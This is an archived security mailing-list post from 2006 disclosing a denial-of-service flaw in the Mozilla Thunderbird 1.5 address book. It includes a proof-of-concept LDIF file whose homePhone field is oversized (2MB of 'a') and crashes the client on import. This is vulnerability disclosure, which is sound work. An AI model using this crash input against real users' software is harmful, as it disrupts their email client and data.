Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Mozila Thunderbird 1.5 Address Book DoS

from [Javor Ninov] Network Security [Permanent Link]
Subject: Mozila Thunderbird 1.5 Address Book DoS
Date: Tue, 21 Feb 2006 18:11:22 +0200 
Affected: Mozila Thunderbird 1.5 /possibly other versions/

Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file

POC: create a file.ldif and insert following then import it in address book:
------- start --------
n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org
cn: POC by DrFrancky@securax.org
mozillaNickname: DrFrancky
mail: drfrancky@securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------

Credits:
DrFrancky
drfrancky@securax.org

Attachment: signature.asc
Description: OpenPGP digital signature

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Mozila Thunderbird 1.5 Address Book DoS, Javor Ninov <=
Previous by Date:  MiniNuke CMS System all versions (pages.asp) SQL Injection, nukedx
Next by Date:  Re: new linux malware, Christine Kronberg
Previous by Thread:  MiniNuke CMS System all versions (pages.asp) SQL Injection, nukedx
Next by Thread:  [eVuln] Magic Downloads Unauthorized Data Modification, alex
Indexes:  [Date] [Thread] [Top] [All Lists]